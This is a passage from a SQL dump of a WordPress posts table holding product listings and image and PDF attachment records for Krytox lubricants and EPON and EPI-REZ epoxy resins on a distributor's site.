valves, or instruments</li>\r\n 	<li>Non-Reactive, non-toxic, nonflammabe, oxygen safe</li>\r\n 	<li>Chemical and corrosion resistance</li>\r\n</ul>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-ts4-thread-sealant', '', '', '2017-08-22 14:03:46', '2017-08-22 14:03:46', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=989', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (990, 2, '2016-08-30 12:46:29', '2016-08-30 12:46:29', '', 'krytox-ts4-thread-sealant', '', 'inherit', 'open', 'closed', '', 'krytox-ts4-thread-sealant', '', '', '2016-08-30 12:46:29', '2016-08-30 12:46:29', '', 989, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-ts4-thread-sealant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (991, 2, '2016-08-30 12:56:06', '2016-08-30 12:56:06', '', 'krytox-fsh-oil', '', 'inherit', 'open', 'closed', '', 'krytox-fsh-oil', '', '', '2016-08-30 12:56:06', '2016-08-30 12:56:06', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-fsh-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (992, 2, '2016-08-30 13:30:15', '2016-08-30 13:30:15', '', 'XP 1A0', 'XP 1A0 is the least viscous and XP 1A7 is the most viscous.\r\n<br /><br />\r\nXP 1A5 is NSF H-1 Rated for incidental food contact. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-1a0', '', '', '2016-09-19 15:04:32', '2016-09-19 15:04:32', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=992', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (993, 2, '2016-08-30 13:33:35', '2016-08-30 13:33:35', '', 'XP 1A1', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-1a1', '', '', '2016-09-19 15:05:22', '2016-09-19 15:05:22', '', 0, 'https://132.148.10.86/wordpress/product/xp-1a1/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (994, 3, '2016-08-30 13:37:23', '2016-08-30 13:37:23', '', 'EPON™ 58034', 'EPON™ Resin 58034 is an elastomer modified epoxy functional adduct formed from the reaction of HELOXY™ 68 Modifier and a carboxyl terminated butadiene-acrylonitrile elastomer. Elastomer content is approximately 50 percent by weight. The primary use of EPON 58034 is in the modification of conventional epoxy systems to increase flexibility, adhesion properties and fatigue resistance. Benefits include:\r\n<ul>\r\n 	<li>High elastomer content provides compounding flexibility to incorporate desired levels of elastomer into finished formulation</li>\r\n 	<li>Compatible with conventional bisphenol A epoxies</li>\r\n 	<li>Low viscosity</li>\r\n 	<li>Imparts improved peel strength and fatigue resistance into adhesive systems</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-58034', '', '', '2016-09-21 14:40:32', '2016-09-21 14:40:32', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=994', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (995, 2, '2016-08-30 13:34:08', '2016-08-30 13:34:08', '', 'XP 1A2', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-1a2', '', '', '2016-09-19 15:08:19', '2016-09-19 15:08:19', '', 0, 'https://132.148.10.86/wordpress/product/xp-1a2/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (996, 2, '2016-08-30 13:34:58', '2016-08-30 13:34:58', '', 'XP 1A3', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-1a3', '', '', '2016-09-19 15:09:17', '2016-09-19 15:09:17', '', 0, 'https://132.148.10.86/wordpress/product/xp-1a3/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (997, 2, '2016-08-30 13:35:28', '2016-08-30 13:35:28', '', 'XP 1A4', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-1a4', '', '', '2016-09-19 15:10:00', '2016-09-19 15:10:00', '', 0, 'https://132.148.10.86/wordpress/product/xp-1a4/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (998, 2, '2016-08-30 13:35:55', '2016-08-30 13:35:55', '', 'XP 1A5', 'NSF H-1 Rated for incidental food contact. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-1a5', '', '', '2016-09-19 15:10:56', '2016-09-19 15:10:56', '', 0, 'https://132.148.10.86/wordpress/product/xp-1a5/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (999, 2, '2016-08-30 13:36:32', '2016-08-30 13:36:32', '', 'XP 1A6', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-1a6', '', '', '2016-09-19 15:11:37', '2016-09-19 15:11:37', '', 0, 'https://132.148.10.86/wordpress/product/xp-1a6/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1000, 3, '2016-08-30 13:36:49', '2016-08-30 13:36:49', '', '58034', '', 'inherit', 'open', 'closed', '', '58034', '', '', '2016-08-30 13:36:49', '2016-08-30 13:36:49', '', 994, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/58034.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1001, 2, '2016-08-30 13:37:09', '2016-08-30 13:37:09', '', 'XP 1A7', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-1a7', '', '', '2016-09-19 15:12:16', '2016-09-19 15:12:16', '', 0, 'https://132.148.10.86/wordpress/product/xp-1a7/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1002, 2, '2016-08-30 13:38:50', '2016-08-30 13:38:50', '', 'XP 2A0', 'XP 2A0 is the least viscous and XP 2A7 is the most viscous. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-2a0', '', '', '2016-09-19 14:48:26', '2016-09-19 14:48:26', '', 0, 'https://132.148.10.86/wordpress/product/xp-2a0/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1009, 2, '2016-08-30 13:44:00', '2016-08-30 13:44:00', '', 'XP 2A1', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-2a1', '', '', '2016-09-19 14:49:27', '2016-09-19 14:49:27', '', 0, 'https://132.148.10.86/wordpress/product/xp-2a1/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1010, 2, '2016-08-30 13:44:38', '2016-08-30 13:44:38', '', 'XP 2A2', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-2a2', '', '', '2016-09-19 14:53:48', '2016-09-19 14:53:48', '', 0, 'https://132.148.10.86/wordpress/product/xp-2a2/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1011, 2, '2016-08-30 13:45:10', '2016-08-30 13:45:10', '', 'XP 2A3', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-2a3', '', '', '2016-09-19 14:54:38', '2016-09-19 14:54:38', '', 0, 'https://132.148.10.86/wordpress/product/xp-2a3/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1012, 2, '2016-08-30 13:45:41', '2016-08-30 13:45:41', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n\r\nUsing Krytox XP 2A5 grease, the manufacturer was able to improve productivity by eliminating frequent downtime, due to bearing failures, as well as by extending the re-lubrication cycle from weekly to once\r\nevery seven weeks. The anti-corrosion protection of the additive in Krytox XP 2A5 grease reduces corrosion, and promotes longer grease and bearing life.', 'XP 2A5', 'Krytox XP 2A5 can be used in similar applications where bearings operate under high loads and the potential for corrosion exists.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-xp-2a5', '', '', '2016-10-07 18:01:20', '2016-10-07 18:01:20', '', 0, 'https://132.148.10.86/wordpress/product/xp-2a4/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1014, 2, '2016-08-30 13:46:37', '2016-08-30 13:46:37', '', 'XP 2A4', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-xp-2a4', '', '', '2016-10-07 17:19:29', '2016-10-07 17:19:29', '', 0, 'https://132.148.10.86/wordpress/product/xp-2a4-2/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1015, 2, '2016-08-30 13:47:01', '2016-08-30 13:47:01', '', 'XP 2A6', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-2a6', '', '', '2016-09-19 15:01:59', '2016-09-19 15:01:59', '', 0, 'https://132.148.10.86/wordpress/product/xp-2a6/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1016, 2, '2016-08-30 13:47:30', '2016-08-30 13:47:30', '', 'XP 2A7', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'xp-2a7', '', '', '2016-09-19 15:02:46', '2016-09-19 15:02:46', '', 0, 'https://132.148.10.86/wordpress/product/xp-2a7/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1017, 2, '2016-08-30 13:50:06', '2016-08-30 13:50:06', '', 'shutterstock_438391567', '', 'inherit', 'open', 'closed', '', 'shutterstock_438391567', '', '', '2016-08-30 13:50:06', '2016-08-30 13:50:06', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_438391567.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1018, 3, '2016-08-30 13:55:15', '2016-08-30 13:55:15', '', 'EPON electrical laminate', '', 'inherit', 'open', 'closed', '', 'epon-electrical-laminate', '', '', '2016-08-30 13:55:15', '2016-08-30 13:55:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-electrical-laminate.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1019, 3, '2016-08-30 13:58:36', '2016-08-30 13:58:36', '', 'EPON™ 1163', 'EPIKOTE™ Resin 1163, a highly brominated epoxy resin, is designed for applications requiring a high degree of flammability resistance. It is a solid epoxy resin with a relatively low softening point and will sinter or block at room temperature. EPIKOTE Resin 1163 is commonly handled in solvent for laminating applications, as a hot melt for casting and molding compound applications, or as a blend with liquid epoxy resins for miscellaneous casting, potting, encapsulation and floor topping uses that require processing at ambient or slightly elevated temperatures. EPIKOTE Resin 1163 offers an alternative for formulators seeking replacements for tetrabromobisphenol A, octa- and decabromodiphenyl oxides, antimony trioxide, phosphorus compounds, and other flame retardant additives for a variety of applications.', 'publish', 'open', 'closed', '', 'epon-1163', '', '', '2016-09-23 17:06:58', '2016-09-23 17:06:58', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1019', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1020, 3, '2016-08-30 13:58:02', '2016-08-30 13:58:02', '', '1163', '', 'inherit', 'open', 'closed', '', '1163', '', '', '2016-08-30 13:58:02', '2016-08-30 13:58:02', '', 1019, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1163.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1021, 2, '2016-08-30 13:59:39', '2016-08-30 13:59:39', '', 'krytox-bearing-oil-grease', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease', '', '', '2016-08-30 13:59:39', '2016-08-30 13:59:39', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1022, 2, '2016-08-30 13:59:52', '2016-08-30 13:59:52', '', 'krytox-bearing-oil-grease-1', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-1', '', '', '2016-08-30 13:59:52', '2016-08-30 13:59:52', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1023, 2, '2016-08-30 14:00:03', '2016-08-30 14:00:03', '', 'krytox-bearing-oil-grease2', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease2', '', '', '2016-08-30 14:00:03', '2016-08-30 14:00:03', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1024, 2, '2016-08-30 14:00:14', '2016-08-30 14:00:14', '', 'krytox-bearing-oil-grease-3', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-3', '', '', '2016-08-30 14:00:14', '2016-08-30 14:00:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1025, 2, '2016-08-30 14:00:25', '2016-08-30 14:00:25', '', 'krytox-bearing-oil-grease-4', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-4', '', '', '2016-08-30 14:00:25', '2016-08-30 14:00:25', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-4.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1026, 2, '2016-08-30 14:00:33', '2016-08-30 14:00:33', '', 'krytox-bearing-oil-grease-5', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-5', '', '', '2016-08-30 14:00:33', '2016-08-30 14:00:33', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-5.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1027, 2, '2016-08-30 14:00:47', '2016-08-30 14:00:47', '', 'krytox-bearing-oil-grease-6', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-6', '', '', '2016-08-30 14:00:47', '2016-08-30 14:00:47', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-6.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1028, 2, '2016-08-30 14:01:05', '2016-08-30 14:01:05', '', 'krytox-bearing-oil-grease-7', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-7', '', '', '2016-08-30 14:01:05', '2016-08-30 14:01:05', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-7.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1029, 2, '2016-08-30 14:01:30', '2016-08-30 14:01:30', '', 'krytox-bearing-oil-grease-8', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-8', '', '', '2016-08-30 14:01:30', '2016-08-30 14:01:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-8.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1030, 2, '2016-08-30 14:01:43', '2016-08-30 14:01:43', '', 'krytox-bearing-oil-grease-9', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-9', '', '', '2016-08-30 14:01:43', '2016-08-30 14:01:43', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-9.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1031, 3, '2016-08-30 14:14:31', '2016-08-30 14:14:31', '', 'EPI-REZ™ 3522-W-60', 'EPI-REZ™ Resin 3522-W-60 is a nonionic, aqueous dispersion of a solid bisphenol A epoxy resin similar to EPON™ Resin 1002F, with an epoxide equivalent weight of 550 to 650 and a Durran’s melting point of 75 to 85 °C. EPI-REZ 3522-W-60 is supplied at a moderate viscosity and is mechanically stable. No organic solvents are present. EPI-REZ 3522-W-60 is completely water reducible, providing for a wide latitude in viscosity reduction. This dispersion is thixotropic; therefore, viscosity readings vary with the spindle speed of the viscometer. EPI-REZ 3522-W-60 offers a solvent-free approach to the formulation of film adhesives, fiberglass reinforced plastics, chemical resistant pipe, and electrical dip coatings and varnishes. In addition, EPI-REZ 3522-W-60 can be used in the formulation of coatings where conventional solvent based epoxy resins are normally used.', 'publish', 'open', 'closed', '', 'epi-rez-3522-w-60', '', '', '2016-09-23 16:59:25', '2016-09-23 16:59:25', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1031', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1032, 3, '2016-08-30 14:13:37', '2016-08-30 14:13:37', '', '3522-W-60', '', 'inherit', 'open', 'closed', '', '3522-w-60', '', '', '2016-08-30 14:13:37', '2016-08-30 14:13:37', '', 1031, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/3522-W-60.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1033, 3, '2016-08-30 14:20:03', '2016-08-30 14:20:03', '', 'EPI-REZ™ 5003-W-55', 'EPI-REZResin 5003-W-55 is a nonionic aqueous dispersion of a polyfunctional aromatic epoxy resin with an average functionality of three. It is intended for high performance applications such as industrial fabric finishes and adhesives which require maximum chemical and solvent resistance and/or elevated temperature service. EPI-REZ 5003-W-55 promotes wetting and adhesion to fiberglass, polyester, nylon, and inorganic mineral fillers. It is recommended as a surface treatment, binder or adhesion promoter in applications involving these and many other substrates.', 'publish', 'open', 'closed', '', 'epi-rez-5003-w-55', '', '', '2016-09-23 17:03:23', '2016-09-23 17:03:23', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1033', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1034, 3, '2016-08-30 14:19:33', '2016-08-30 14:19:33', '', '5003-W-55', '', 'inherit', 'open', 'closed', '', '5003-w-55', '', '', '2016-08-30 14:19:33', '2016-08-30 14:19:33', '', 1033, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/5003-W-55.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1035, 3, '2016-08-30 14:24:56', '2016-08-30 14:24:56', '', 'EPI-REZ™ 5522-WY-55', 'This polyfunctional epoxy resin dispersion is intended for use in ambient cure, two-component, water reducible epoxy coatings formulated for applications requiring a high degree of chemical and corrosion protection. Although EPI-REZ 5522-WY-55 exhibits good compatibility with several amine functional water reducible converters, it is suggested for use with water reducible EPIKURE™ 8290-Y-60 Curing Agent. Clear paints, enamels and primers for metal, concrete or masonary can be formulated with EPI-REZ™ 5522-WY-55. Benefits include:\r\n<ul>\r\n 	<li>Rapid room temperature cure; Low VOC</li>\r\n 	<li>Good paint stability; Performance versatility</li>\r\n 	<li>Long-term water and humidity resistance</li>\r\n 	<li>Corrosion resistance over a variety of substrates</li>\r\n 	<li>Adhesion to damp concrete</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epi-rez-5522-wy-55', '', '', '2016-09-23 17:05:02', '2016-09-23 17:05:02', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1035', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1036, 2, '2016-08-30 14:21:44', '2016-08-30 14:21:44', '', 'krytox-bearing-oil-grease-10', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-10', '', '', '2016-08-30 14:21:44', '2016-08-30 14:21:44', '', 1001, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-10.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1037, 2, '2016-08-30 14:21:57', '2016-08-30 14:21:57', '', 'krytox-bearing-oil-grease-11', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-11', '', '', '2016-08-30 14:21:57', '2016-08-30 14:21:57', '', 1001, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-11.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1038, 2, '2016-08-30 14:22:16', '2016-08-30 14:22:16', '', 'krytox-bearing-oil-grease-12', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-12', '', '', '2016-08-30 14:22:16', '2016-08-30 14:22:16', '', 1001, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-12.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1039, 2, '2016-08-30 14:22:36', '2016-08-30 14:22:36', '', 'krytox-bearing-oil-grease-13', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-13', '', '', '2016-08-30 14:22:36', '2016-08-30 14:22:36', '', 1001, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-13.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1040, 2, '2016-08-30 14:22:53', '2016-08-30 14:22:53', '', 'krytox-bearing-oil-grease-14', '', 'inherit', 'open', 'closed', '', 'krytox-bearing-oil-grease-14', '', '', '2016-08-30 14:22:53', '2016-08-30 14:22:53', '', 1001, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-bearing-oil-grease-14.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1041, 3, '2016-08-30 14:24:10', '2016-08-30 14:24:10', '', '5522-WY-55', '', 'inherit', 'open', 'closed', '', '5522-wy-55', '', '', '2016-08-30 14:24:10', '2016-08-30 14:24:10', '', 1035, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/5522-WY-55.pdf', 0, 'attachment', 'application/pdf', 0); 
